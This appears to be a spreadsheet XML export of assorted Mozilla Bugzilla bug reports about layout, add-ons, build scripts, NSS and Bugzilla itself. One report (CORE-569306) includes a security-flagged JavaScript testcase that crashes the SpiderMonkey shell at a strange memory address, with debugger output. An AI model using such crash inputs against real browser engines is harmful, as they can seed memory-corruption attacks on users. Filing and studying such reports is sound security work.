Fortunately this is a fairly simple fix.
I created patches against oggplay for this a while back but they aren't currently merged and may have issues.</t>
  </si>
  <si>
    <t>CORE-363176</t>
  </si>
  <si>
    <t>[reflow branch] Very large scrollbar with this img inside -moz-inline-box</t>
  </si>
  <si>
    <t>See upcoming testcase I get a very large vertical where I would not expect a scrollbar at all.
This worked fine with the 2006-12-06 build so very likely a regression from the reflow branch landing.</t>
  </si>
  <si>
    <t>TOOLKIT-337696</t>
  </si>
  <si>
    <t>Add-ons Manager displays the Restart Bon Echo button after failed installation</t>
  </si>
  <si>
    <t>Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.1a2) Gecko/20060511 BonEcho/2.0a2 ID:2006051103
When installations fails for example because of version incompatibility the Add-ons Manager stays in the Installation tab and still offers to restart the program displaying Restart Bon Echo button.
Steps to reproduce:
1. Try to install an incompatible extension from the above URL.
I don't know if it should stay in an empty Installation tab but it certainly shouldn't offer to restart the program.</t>
  </si>
  <si>
    <t>ancestor.ak</t>
  </si>
  <si>
    <t>CORE-183299</t>
  </si>
  <si>
    <t>[FIXr]CreateSheet/LoadSheet issue with mIsSyncLoad</t>
  </si>
  <si>
    <t>Just thought about this some more and we have a slight problem if someone tries
to use a single loader to load the same sheet as a UA sheet synchronously and as
any sort of sheet asynchronously.  CreateSheet will find the existing load and
clone the sheet then LoadSheet will synchronously parse into it.
The solution methinks is to tell CreateSheet whether the load is sync...</t>
  </si>
  <si>
    <t>BUGZILLA-307524</t>
  </si>
  <si>
    <t>Templatise the updategroupcontrols bit of editproducts (and tidy up templatisation)</t>
  </si>
  <si>
    <t>1) Do the updategroupcontrols templatisation
2) remove any temporary bits we added during templatisation
3) add a ThrowUserError() for an unknown action</t>
  </si>
  <si>
    <t>THUNDERBIRD-310146</t>
  </si>
  <si>
    <t>Error Console error message:Error in parsing value for property 'margin'.</t>
  </si>
  <si>
    <t>In preferences.css  the value of 'Margin' is illegal. 
141 #downloadFolder {
142   -moz-appearance: none
143   background-color: transparent
144   border: none
145   padding: 1px 0px 0px 0px
146   margin: none
147 }
JavaScript Console message:
Error: Error in parsing value for property 'margin'.  Declaration dropped.
Source File: chrome://messenger/skin/preferences/preferences.css
Line: 146
Mac OS X 10.3.9
1.8 branch NB</t>
  </si>
  <si>
    <t>DIRECTORY-313782</t>
  </si>
  <si>
    <t>PerLDAP</t>
  </si>
  <si>
    <t>Make build with no user input</t>
  </si>
  <si>
    <t>Need to be able to build perldap with no user interaction e.g. rpmbuild and the like.  If the NSPR location is given as an env. var. assume the builder wants to use it.
Index: Makefile.PL
===================================================================
RCS file: /cvsroot/mozilla/directory/perldap/Makefile.PLv
retrieving revision 1.16.2.9
diff -u -8 -r1.16.2.9 Makefile.PL
--- Makefile.PL 7 Oct 2005 18:23:57 -0000       1.16.2.9
+++ Makefile.PL 25 Oct 2005 18:30:47 -0000
@@ -14023 +14025 @@
 # see if ldap and nspr files are in the same place
 if ( -f $include_ldap${dir_sep}nspr.h ) {
        $nspr_loc = $ldapsdk_loc
 }
 print Directory containing NSPR API 'include' and 'lib'\n
 print directories for NSPR support (type 'n' or 'none' to omit) (default: $nspr_loc): 
 $silent = 0
-chomp ($input = )
-if ($input =~ /^n/i) {
-       $nspr_loc = undef
-} elsif ($input =~ /\S/) {
-       $nspr_loc = $input
+if (!$ENV{NSPRDIR}) {
+   chomp ($input = )
+   if ($input =~ /^n/i) {
+      $nspr_loc = undef
+   } elsif ($input =~ /\S/) {
+       $nspr_loc = $input
+   }
 } else {
-       print $nspr_loc\n
+   print $nspr_loc\n
 }
 if ($nspr_loc) {
    $lib_nspr = $nspr_loc . ${dir_sep} . 'lib'
    $include_nspr = $nspr_loc . ${dir_sep} . 'include'
    croak(Missing required include file $include_nspr${dir_sep}nspr.h) unless -f $include_nspr${dir_sep}nspr.h
    $pr_def = -DPRLDAP
 }</t>
  </si>
  <si>
    <t>leif</t>
  </si>
  <si>
    <t>TOOLKIT-251431</t>
  </si>
  <si>
    <t>about:config doesn't show new prefs while filter is applied</t>
  </si>
  <si>
    <t>Reproducibility: Always
Steps to Reproduce:
1. Go to about:config
2. Type in any string for the Filter (e.g. test)
3. Add a new pref that matches that filter (e.g. http.test)
Expected Results:
The newly added pref immediately shows up because it matches the filter.
Actual Results:
The newly added pref is at first not visible. You must press Enter in the Filter
field to get it to appear.
First noticed in Mozilla 1.7. Reproduced in Mozilla trunk build 2004071108.</t>
  </si>
  <si>
    <t>mars.martian+bugmail</t>
  </si>
  <si>
    <t>SEAMONKEY-568052</t>
  </si>
  <si>
    <t>Adapt Modern theme for new Add-on Manager</t>
  </si>
  <si>
    <t>The new Add-on Manager (which now opens in a new tab or window) requires porting the corresponding CSS style rules (extensions.css) to the Modern theme maybe also new images etc.
The initial changeset that affected the Default theme was this:
http://hg.mozilla.org/mozilla-central/rev/e3b94f3e9baa</t>
  </si>
  <si>
    <t>CORE-385635</t>
  </si>
  <si>
    <t>content overflows table cell</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9a6pre) Gecko/20070623 Minefield/3.0a6pre
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9a6pre) Gecko/20070623 Minefield/3.0a6pre
At the bottom of the topic list on the example page the Goto ... text links render over into the DIV containing the recent postings.
Reproducible: Always
Steps to Reproduce:
1. Visit site
2. Scroll down
3. See effect
Actual Results:  
The Goto ... text links render over into the DIV containing the recent postings.
Expected Results:  
The right edge of the text should line up with the left edge of the DIV
This changed with the nightly of 2007-06-21.</t>
  </si>
  <si>
    <t>SOCORRO-423658</t>
  </si>
  <si>
    <t>always display module name in stack traces</t>
  </si>
  <si>
    <t>Currently we leave the module name out of the stack trace if we have function information. This sucks for things like system libraries where all you get is a function name and it may not be obvious where it comes from. Check out thread 1 in this crash for example:
http://crash-stats.mozilla.com/report/index/3510f8a8-f4e9-11dc-b194-001a4bd43e5c
Frame	Signature	Source
0	KiFastSystemCallRet	
1	NtRemoveIoCompletion	
2	SockAsyncThread	
3	BaseThreadStart	
In the raw dump you can see that those are clearly:
1|0|ntdll.dll|KiFastSystemCallRet|||0x0
1|1|ntdll.dll|NtRemoveIoCompletion|||0xb
1|2|mswsock.dll|SockAsyncThread|||0x59
1|3|kernel32.dll|BaseThreadStart|||0x36
I think we should just add a Module column to the stack trace and display the module there.</t>
  </si>
  <si>
    <t>CLOUD_SERVICES-526940</t>
  </si>
  <si>
    <t>Use https instead of http for weave ToS</t>
  </si>
  <si>
    <t>Bug 526096 added the ToS link but it links to http://mozillalabs.com/weave/tos/
http://hg.mozilla.org/labs/weave/file/0.8/source/defaults/preferences/sync.js.in#l5
Not sure if https is necessary though..</t>
  </si>
  <si>
    <t>NSS-359302</t>
  </si>
  <si>
    <t>Remove the sslsample code from NSS source tree</t>
  </si>
  <si>
    <t>The sslsample programs (client and server) are anything but exemplary.
They have bugs filed against them.  Rather than fixing those bugs
I propose to get rid of all the sslsample code from the NSS source tree.
Any objections?</t>
  </si>
  <si>
    <t>CORE-329162</t>
  </si>
  <si>
    <t>crash [@ gfxWindowsTextRun::MeasureOrDrawUniscribe] [@ gfxWindowsTextRun::MeasureOrDrawAscii]</t>
  </si>
  <si>
    <t>Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.9a1) Gecko/20060302 Firefox/1.6a1 ID:2006030212 (Cairo)
repro:
go to url
submit an image
Incident ID: 15849325
Stack Signature	gfxWindowsTextRun::MeasureOrDrawUniscribe 581a8dcd
Product ID	FirefoxTrunk
Build ID	2006030205
Trigger Time	2006-03-02 14:56:07.0
Platform	Win32
Operating System	Windows NT 5.0 build 2195
Module	firefox.exe + (000fe77a)
URL visited	http://www.greywyvern.com/code/php/binary2base64
User Comments	crash on submitting image
Since Last Crash	4088 sec
Total Uptime	12074 sec
Trigger Reason	Access violation
Source File Line No.	c:\builds\tinderbox\fx-trunk-cairo\winnt_5.2_depend\mozilla\gfx\thebes\src\gfxwindowsfonts.cpp line 588
Stack Trace 	
gfxWindowsTextRun::MeasureOrDrawUniscribe</t>
  </si>
  <si>
    <t>CORE-394012</t>
  </si>
  <si>
    <t>ASSERTION: Inner window detected in Equality hook!</t>
  </si>
  <si>
    <t>1.8/1.9 windows/mac/linux
Array.reverse(null) == Array.prototype.reverse.apply(null [])
Array.reverse(undefined) == Array.prototype.reverse.apply(undefined [])
Array.sort(null) == Array.prototype.sort.apply(null [])
Array.sort(undefined) == Array.prototype.sort.apply(undefined [])
###!!! ASSERTION: Inner window detected in Equality hook!: 'win-&gt;IsOuterWindow()' file /work/mozilla/builds/1.9.0/mozilla/dom/src/base/nsDOMClassInfo.cpp line 6133
###!!! ASSERTION: Inner window detected in Equality hook!: 'other-&gt;IsOuterWindow()' file /work/mozilla/builds/1.9.0/mozilla/dom/src/base/nsDOMClassInfo.cpp line 6139</t>
  </si>
  <si>
    <t>CORE-407954</t>
  </si>
  <si>
    <t>Eliminate redundant JOF_ASSIGNING in jsopcode.tbl</t>
  </si>
  <si>
    <t>Since the patch for bug 94693 (long time ago) made JOF_ASSIGNING an alias for JOF_SET we can use just JOF_SET in jsopcode.tbl. We could get rid of the JOF_ASSIGNING flag too since it's used only internally. Its name does line up better with JSRESOLVE_ASSIGNING.
/be</t>
  </si>
  <si>
    <t>SUPPORT.MOZILLA.ORG-398353</t>
  </si>
  <si>
    <t>l10n fallback</t>
  </si>
  <si>
    <t>If a page doesn't exist for the requested locale TikiWiki should fallback according to the http accept-language header if not logged in or according to the user preferences if logged in. The software should still maintain the locale string in the url and in-page links to other articles should still use the original locale if they exist.
Example:
User visits http://support.mozilla.com/sv/kb/ArticleName which doesn't exist in Swedish. Page served is the English version of ArticleName but the URL remains unchanged. ArticleName links to another article ArticleTwo. The user clicks on it and the url changes to http://support.mozilla.com/sv/kb/ArticleTwo.</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-459888</t>
  </si>
  <si>
    <t>lv / Latvian</t>
  </si>
  <si>
    <t>[lv] Search engine setup for Firefox 3 for Latvian.</t>
  </si>
  <si>
    <t>We want to ship Firefox 3 a good list of search engines for Latvian. 
We're going to work towards this in three phases. First the localization team and Stas (Stas Malolepszy) will look at the market for the language and come up with a good set of search providers. Raivis we'll need your input on this the guidelines for making recommendations are on http://wiki.mozilla.org/Firefox_web_services_guidelines. 
For en-US we currently use this set to which we can fall back in the case of lacking localized alternatives:
Google Yahoo Amazon Answers CC eBay Wikipedia
After we decided on a particular search engine Stas will contact the owner and ask for permission and for specifics like proper search flags. undefined we'll likely need your help to at least get the contact information.
Once we have a specification on what the searchengines for Latvian should look like the localization team and Axel will work on an implementation on that. This should happen by the localization team creating and attaching patches for the desired changes and requesting review from Axel. After a successful review the localization team will land them.
Please don't commit any modifications in l10n/lv/browser/searchplugins to the cvs repository without a patch reviewed by Axel Stas or someone else appointed by Stas or SethB. The data here is sensitive to users and our search partners thus the extra care here.</t>
  </si>
  <si>
    <t>SKYWRITER_GRAVEYARD-487862</t>
  </si>
  <si>
    <t>Use relative paths instead of absolute paths</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9.0.8) Gecko/2009033100 Ubuntu/9.04 (jaunty) Firefox/3.0.8
Build Identifier: 
I'm currently working on a php backend. Though in my hunt to make the php backend I found a little 'bug'. Bespin is currently always on the root directory of a domain. If you put bespin in a subdirectory the js will stop with working. So bespin thinks it's the king of the domain. The following patch will correct
that behavior. Now bespin will try to find his images and backend
files on a relative path. 
=== modified file 'js/bespin/parser/parser.js'
--- js/bespin/parser/parser.js	2009-04-10 21:28:56 +0000
+++ js/bespin/parser/parser.js	2009-04-10 21:35:35 +0000
@@ -4707 +4707 @@
     bespin.parser.EngineResolver
     1 // just one worker please
     // we need these libs. Should probably move to a property of the JS engine
-    [/js/jsparse/jsdefs.js /js/jsparse/jsparse.js])
+    [./js/jsparse/jsdefs.js ./js/jsparse/jsparse.js])
 // As soon as a doc is opened we are a go
 bespin.subscribe(editor:openfile:opensuccess function() {
=== modified file 'js/th/th.js'
--- js/th/th.js	2009-04-10 21:28:56 +0000
+++ js/th/th.js	2009-04-10 21:29:20 +0000
@@ -1087 +1087 @@
         var links = []
         // add default stylesheet cheesy path at the moment need to come up with a better way to approach this TODO
-        links.push({ url: /js/th/default.css array: this.userAgentCss index: 0 })
+        links.push({ url: ./js/th/default.css array: this.userAgentCss index: 0 })
         var s l = document.getElementsByTagName('link') counter = 0
 		for (var i=0 i &lt; l.length i++){
Reproducible: Always</t>
  </si>
  <si>
    <t>nikosverschore</t>
  </si>
  <si>
    <t>CORE-939475</t>
  </si>
  <si>
    <t>gcparam() help and error message do not mention markStackLimit</t>
  </si>
  <si>
    <t>Error message:
http://mxr.mozilla.org/mozilla-central/source/js/src/builtin/TestingFunctions.cpp#287
Help:
http://mxr.mozilla.org/mozilla-central/source/js/src/builtin/TestingFunctions.cpp#1344</t>
  </si>
  <si>
    <t>mz_mhs-ctb</t>
  </si>
  <si>
    <t>THUNDERBIRD-397838</t>
  </si>
  <si>
    <t>Tag button shrinks in its disabled state</t>
  </si>
  <si>
    <t>Created attachment 282625
Screenshot
Click on inbox than an empty folder or a folder without a message selected...do this back and forth and you'll see the tag button shrink in size.
The drop down arrow moves to the left by 1 pixel
The tag icon and text move to the right by 2 pixels</t>
  </si>
  <si>
    <t>CORE-315881</t>
  </si>
  <si>
    <t>SVG causes huge memory consumption</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.7.10) Gecko/20050716 Firefox/1.0.6
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.7.10) Gecko/20050716 Firefox/1.0.6
When opening the URL the memory usage of X will grow to huge proportions (450MB or 90% of available memory).
Reproducible: Always
Steps to Reproduce:
1. Open URL http://www.friesoft.nl/adn.svg
Actual Results:  
X slows down.
Expected Results:  
Rendered SVG (or error message if used parts of the SVG or not implemented yet)
The SVG is written by myself and renders correctly in Adobe SVG Viewer in both Linux (Firefox 1.0.7) and Windows (Internet Explorer 6). It uses a large amount of scripts but they are not available in the testcase. When scripts are available the same thing happens.
Because the system slows down it is hard to find out what exactly the problem is.</t>
  </si>
  <si>
    <t>SEAMONKEY-387686</t>
  </si>
  <si>
    <t>No access to VersionTracker</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.9a7pre) Gecko/2007071101 SeaMonkey/2.0a1pre
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.9a7pre) Gecko/2007071101 SeaMonkey/2.0a1pre
Today's build cannot connect to any page from VersionTracker website. I've checked with many other browsers they can. I get this message:
The requested URL (any URL from VersionTracker) was not found on this server.
Additionally a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>quicksilver8</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-249928</t>
  </si>
  <si>
    <t>vltb.nl - mozilla doesn't scroll pictures using java-script</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.7) Gecko/20040622
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.7) Gecko/20040622
Mozilla doesn't scroll through the list of pictures when hovering over the arrow
buttons.
There is some java script coupled to the buttons.
I'm not sure if this is a browser bug or not.
Reproducible: Always
Steps to Reproduce:
1. goto URL (above)
2. move mouse over the arrow that points to the right (click not needed)
Actual Results:  
Nothing happens.
Expected Results:  
The pictures on the URL start scrolling to the right showing new pictures while
hovering over the right arrow. The pictures scroll to the left when hovering
over the left button with the mouse.
IE6 works fine with this site.
Konqueror works fine with this site. (!!)</t>
  </si>
  <si>
    <t>harm.verhagen+bugzilla</t>
  </si>
  <si>
    <t>CORE-334180</t>
  </si>
  <si>
    <t>pldhash/jsdhash should assert that ops don't mutate the table</t>
  </si>
  <si>
    <t>pldhash should assert that its ops don't recursively mutate the table by checking that table-&gt;entryCount table-&gt;removedCount and (maybe) table-&gt;generation do not change across calls to ops.  See bug 334177 for a crash that this might have caught sooner.
I still haven't thought of a good way to do this without making the code messy but I'll try to think about it.  I expect I'll introduce a macro for calling ops though.</t>
  </si>
  <si>
    <t>NSS-290345</t>
  </si>
  <si>
    <t>Changes in NSS's public interface between NSS_3_9_RTM and NSS_3_10_RTM</t>
  </si>
  <si>
    <t>This bug contains information on the changes in NSS's
public interface between NSS_3_9_RTM and NSS_3_10_RTM.
This information can be used to
1) verify that NSS 3.10 is backward compatible with
NSS 3.9 and
2) generate the What's New section in NSS 3.10's release
notes.
NSS's public interface consists of:
1. public exported header files
2. *.def files for the shared libraries/DLLs
3. pkg/solaris/SUNWtlsd/prototype
Before I attach the diffs in these files I'll first
describe the new and removed header files.
1. Two new header files are added in NSS 3.10: pk11pub.h
and pk11priv.h which contain the public and private
functions declared in the original pk11func.h header.
pk11func.h in NSS 3.10 simply includes pk11pub.h and
pk11priv.h.
2. Three headers are removed in NSS 3.10: secutil.h
zconf.h and zlib.h.  These headers are from NSS's
cmd directory and should not have been exported.
Note that the Solaris SUNWtlsd package never exported
these three headers.</t>
  </si>
  <si>
    <t>CORE-647570</t>
  </si>
  <si>
    <t>Clean up nsSimpleURI inheritance in nsJSProtocolHandler</t>
  </si>
  <si>
    <t>There are a variety of URI implementations that inherit from nsSimpleURI but do this at runtime.  This is because back before libxul was the one true build configuration nsSimpleURI was only guaranteed to be exposed by Necko through XPCOM.  This leads to code like http://mxr.mozilla.org/mozilla-central/source/dom/src/jsurl/nsJSProtocolHandler.h#93 which inherits from nsSimpleURI at runtime through XPCOM.
This should all die.</t>
  </si>
  <si>
    <t>emanuele.costa</t>
  </si>
  <si>
    <t>BUGZILLA-319466</t>
  </si>
  <si>
    <t>commenter contains and was me fails with: Not unique table/alias: 'longdescs_0'</t>
  </si>
  <si>
    <t>https://bugzilla.mozilla.org/buglist.cgi?query_format=advanced&amp;short_desc_type=allwordssubstr&amp;short_desc=+&amp;product=Bugzilla&amp;long_desc_type=allwordssubstr&amp;long_desc=&amp;bug_file_loc_type=allwordssubstr&amp;bug_file_loc=&amp;status_whiteboard_type=allwordssubstr&amp;status_whiteboard=&amp;keywords_type=allwords&amp;keywords=&amp;resolution=DUPLICATE&amp;resolution=---&amp;emaillongdesc1=1&amp;emailtype1=exact&amp;email1=bugzilla%40chimpychompy.org&amp;emailassigned_to2=1&amp;emailreporter2=1&amp;emailqa_contact2=1&amp;emailtype2=exact&amp;email2=&amp;bugidtype=include&amp;bug_id=&amp;votes=&amp;chfieldfrom=&amp;chfieldto=Now&amp;chfieldvalue=&amp;cmdtype=doit&amp;order=Reuse+same+sort+as+last+time&amp;field0-0-0=longdesc&amp;type0-0-0=substring&amp;value0-0-0=title&amp;field0-1-0=commenter&amp;type0-1-0=equals&amp;value0-1-0=bugzilla%40chimpychompy.org
Software error:
DBD::mysql::st execute failed: Not unique table/alias: 'longdescs_0' [for Statement SELECT bugs.bug_id bugs.bug_severity bugs.priority bugs.bug_status bugs.resolution bugs.bug_severity bugs.priority bugs.rep_platform map_assigned_to.login_name bugs.bug_status bugs.resolution bugs.short_desc FROM bugs  INNER JOIN profiles AS map_assigned_to ON (bugs.assigned_to = map_assigned_to.userid) LEFT JOIN longdescs AS longdescs_LD0 ON (longdescs_LD0.bug_id = bugs.bug_id  AND longdescs_LD0.who IN (15150)) INNER JOIN longdescs AS longdescs_0 ON (longdescs_0.bug_id = bugs.bug_id ) LEFT JOIN longdescs AS longdescs_0 ON (longdescs_0.bug_id = bugs.bug_id ) LEFT JOIN profiles AS map_longdescs_0 ON (longdescs_0.who = map_longdescs_0.userid) LEFT JOIN bug_group_map  ON bug_group_map.bug_id = bugs.bug_id  WHERE ((bugs.product_id IN (19)) AND (bugs.resolution IN ('DUPLICATE''')) AND (longdescs_LD0.who IS NOT NULL)) AND ((INSTR(CAST(LOWER(longdescs_0.thetext) AS BINARY) CAST('title' AS BINARY)) &gt; 0) AND (map_longdescs_0.login_name = 'bugzilla@chimpychompy.org')) AND bugs.creation_ts IS NOT NULL AND ((bug_group_map.group_id IS NULL)) GROUP BY bugs.bug_id] at /opt/webtools/bugzilla/buglist.cgi line 849
For help please send mail to the webmaster (sysadmins@mozilla.org) giving this error message and the time and date of the error.</t>
  </si>
  <si>
    <t>SEAMONKEY-605586</t>
  </si>
  <si>
    <t>[Mac default] Style the Findbar</t>
  </si>
  <si>
    <t>The View Source Findbar looks a bit odd in Mac default:
- it needs some more heigh
- the color of the bottom border is wrong</t>
  </si>
  <si>
    <t>ADD-ON_SDK_GRAVEYARD-597837</t>
  </si>
  <si>
    <t>Confusing ValueError: invalid resource hostname when using cfx run with 'name' in package.json containing spaces</t>
  </si>
  <si>
    <t>By mistake I put this in package.json:
{
    name: jetpack page-worker test
    id: jid0-saEuBy3Ndh3oeuuYgnzj9ZS5Aqs
}
To which 'cfx run' complained:
Traceback (most recent call last):
  File /Users/nickolay/dev/jetpack-sdk/bin/cfx line 6 in 
    cuddlefish.run()
  File /Users/nickolay/dev/jetpack-sdk/python-lib/cuddlefish/__init__.py line 501 in run
    include_dep_tests=options.dep_tests
  File /Users/nickolay/dev/jetpack-sdk/python-lib/cuddlefish/packaging.py line 267 in generate_build_for_target
    add_dep_to_build(dep)
  File /Users/nickolay/dev/jetpack-sdk/python-lib/cuddlefish/packaging.py line 254 in add_dep_to_build
    add_section_to_build(dep_cfg lib is_code=True)
  File /Users/nickolay/dev/jetpack-sdk/python-lib/cuddlefish/packaging.py line 232 in add_section_to_build
    validate_resource_hostname(name)
  File /Users/nickolay/dev/jetpack-sdk/python-lib/cuddlefish/packaging.py line 65 in validate_resource_hostname
    raise ValueError('invalid resource hostname: %s' % name)
ValueError: invalid resource hostname: jid0-saeuby3ndh3oeuuygnzj9zs5aqs-jetpack page-worker test-lib
Where 'jid0-saeuby3ndh3oeuuygnzj9zs5aqs-jetpack page-worker test-lib' appears to autocomplete for each of the three tokens in the package.json's 'name' which confused me greatly.
Should cfx just validate package.json and complain if 'name' contains spaces?
(jetpack tip http://hg.mozilla.org/labs/jetpack-sdk/rev/0754e897a883)</t>
  </si>
  <si>
    <t>wkocher</t>
  </si>
  <si>
    <t>TOOLKIT-202992</t>
  </si>
  <si>
    <t>h or htt cut off in address bar autocomplete (adds :// to domain names starting with p or t)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.4a) Gecko/20030422 Firebirdâ„¢ Browser/0.6
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.4a) Gecko/20030422 Firebirdâ„¢ Browser/0.6
Autocomplete address bar entries have the htp at the front cut off when you
attempt to change them with the left and right arrow keys.
Reproducible: Always
Steps to Reproduce:
1. Start typing an address for a site you've visited before to get an auto
complete entry
2. Use the up and down arrows to select an entry
3. Use the left and right arrows to select part of it to change
4. Press enter
Actual Results:  
The htp is cut off and the error message p is not a registered protocol
results.
Expected Results:  
Not cut off the htp and instead went to the (now edited) URL from autocomplete
I'm unsure but this may be in some way related to 172530? (though it's not the
same as far as I can tell. Theme doesn't seem to matter.</t>
  </si>
  <si>
    <t>mark11</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-484806</t>
  </si>
  <si>
    <t>Please push latest Firefox w/eBay Companion repacks to releases.mozilla.com</t>
  </si>
  <si>
    <t>Howdy
Please push the Firefox 3.0.7 with eBay Companion repacks to releases.mozilla.com. The tarball containing the installers is located at:
people.mozilla.com:/tmp/ebay-2009-signed.tar
The tarball should be extracted into the directory that corresponds with
http://releases.mozilla.com/ebay/2.0.0.3-online/ and the existing
builds should not be removed.
If you have any questions please let me know.
Thanks much
kev</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-251673</t>
  </si>
  <si>
    <t>403 Forbidden</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7) Gecko/20040714 Firefox/0.9.1+
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7) Gecko/20040714 Firefox/0.9.1+
I have a feeling that the UAE has been blocked from accessing
http://bugzilla.mozilla.org/. When I try to access that page I get a 403
forbidden page ? Is there a reason why it has been blocked and prevents
legitimate individuals from reporting bugs ?
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>arvind_2111</t>
  </si>
  <si>
    <t>CALENDAR-148435</t>
  </si>
  <si>
    <t>'minutes' in alarm setting secton in new event screen is partly covered because dropdown is to narrow</t>
  </si>
  <si>
    <t>In the new event screen 'minut...' is displayed in the alarm section's dropdown
list because it is too narrow. Obviously 'minutes' should be displayed.</t>
  </si>
  <si>
    <t>andrewjjones</t>
  </si>
  <si>
    <t>CORE-511534</t>
  </si>
  <si>
    <t>Poor interaction with the software keyboard</t>
  </si>
  <si>
    <t>When the software keyboard is enabled on the n810 (or on the n800) the software keyboard commonly does not interact as expected in Fenenc.
For example if you click on the URL bar you will see the software keyboard appear.  However dismissing the software keyboard does not happen even if you press the return software key or the the dismiss software key.
Pressing the return key correctly puts the entered text in the text area of the browser but the software keyboard is displayed again because focus remains in the text area. 
Pressing the dismiss key correctly dismisses the keyboard but it is displayed again because focus remains in the text area.</t>
  </si>
  <si>
    <t>CORE-569306</t>
  </si>
  <si>
    <t>(64-bit) Crash: [@ js_ArrayClass] or [@ js_GetPropertyHelper] or Assertion failure: JSVAL_IS_OBJECT(v)</t>
  </si>
  <si>
    <t>typeof w &amp; options().i
function g() {
  delete this.uneval
  uneval
}
g()
(function() {
  for each(e in [
      0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
    ]) {
    (function f(aaaaaa) {
      for (x in ) {}
      if (aaaaaa) {
        f(aaaaaa - 1)
      }
    } (2906))
  }
} ())
crashes 64-bit js opt shell on TM tip without -j at js_ArrayClass with js_GetPropertyHelper somewhere on the stack and asserts 64-bit js debug shell on TM tip without -j at Assertion failure: JSVAL_IS_OBJECT(v) at ../jsapi.h:183
s-s because it crashes at a strange and scary memory address which had seemingly morphed several times during the process of reduction. Assume [sg:critical?] unless otherwise noted.
Program received signal EXC_BAD_ACCESS Could not access memory.
Reason: KERN_PROTECTION_FAILURE at address: 0x000000010018dfe0
0x000000010018dfe0 in js_ArrayClass ()
(gdb) bt
#0  0x000000010018dfe0 in js_ArrayClass ()
#1  0x0000000100072dec in js_LookupPropertyWithFlags ()
#2  0x0000000100074a19 in js_GetPropertyHelper ()
#3  0x0000000100074dae in js_GetMethod ()
#4  0x000000010006802c in GetIterator ()
#5  0x0000000100068bfe in js_ValueToIterator ()
#6  0x00000001000579fd in js_Interpret ()
#7  0x0000000100063f85 in js_Execute ()
#8  0x000000010000d110 in JS_ExecuteScript ()
#9  0x000000010000341a in Process ()
#10 0x0000000100006f4d in main ()
(gdb) x/i $rip
0x10018dfe0 :    and    %eax(%rdx)
(gdb) x/b $eax
Value can't be converted to integer.
(gdb) x/b $rdx
0x1012007e4:    0x00</t>
  </si>
  <si>
    <t>CORE-749768</t>
  </si>
  <si>
    <t>Disable --valgrind flag for jit_test.py when running make check with AddressSanitizer</t>
  </si>
  <si>
    <t>In js/src/Makefile.in the jit_test.py script is called with --valgrind which causes some tests to timeout because running an ASan binary under valgrind doesn't work.
I'm writing a patch that only passes --valgrind in the Makefile when MOZ_ASAN is not set.</t>
  </si>
  <si>
    <t>TOOLKIT-376815</t>
  </si>
  <si>
    <t xml:space="preserve">Allow using a listheader in </t>
  </si>
  <si>
    <t>Created attachment 260918
patch
Allow using a listheader in a richlishbox.
I would like to keep this simple for now no multiple headers/sort support etc.</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-494205</t>
  </si>
  <si>
    <t>Migrate or archive content in XPInstall project directory on www.mozilla.org</t>
  </si>
  <si>
    <t>Some of the XPInstall documentation on www.mozilla.org has been moved over
to MDC so we should either archive any remaining pages that are out of date or
migrate them over to MDC and set up redirects.</t>
  </si>
  <si>
    <t>SUPPORT.MOZILLA.ORG-291435</t>
  </si>
  <si>
    <t>Guide to migrate from Mozilla to Firefox / Thunderbird</t>
  </si>
  <si>
    <t>A reminder for me self. Do this after bug 66387 is done
(if there is such a guide already please close this bug and point me to it)</t>
  </si>
  <si>
    <t>CORE-28307</t>
  </si>
  <si>
    <t>Scrolling perf problem: GetGCfromDW algorithm speedup</t>
  </si>
  <si>
    <t>GetGCfromDW searches the GC cache in a rather painful way.  The algorithm has
two problems: 
1) it does a linear traversal of the list for each search
2) the comparator used in the traversal is a memcmp() of the entire GC struct
This suggests either giving GCs some sort of identifier and using a better
structure for the search (some sort of tree perhaps) or just hashing the GC
struct and using a hash table.</t>
  </si>
  <si>
    <t>BUGZILLA-148993</t>
  </si>
  <si>
    <t>debug flag in buglist not working. (2.16 hack)</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS_GRAVEYARD-381933</t>
  </si>
  <si>
    <t>Enable Urchin Tracking Module for AMO</t>
  </si>
  <si>
    <t>The latest AMO update includes the __utm.js for better statistics in Urchin. Please enable the UTM for AMO.
Steps 3 and 4 should be all that's left: http://www.google.com/support/urchin45/bin/answer.py?answer=28710
If there are advanced config options as shown in step 4 whatever we use for mozilla.com would probably be a good starting point.
Thanks!</t>
  </si>
  <si>
    <t>MARKETING-213415</t>
  </si>
  <si>
    <t>Standards Website</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.4) Gecko/20030624
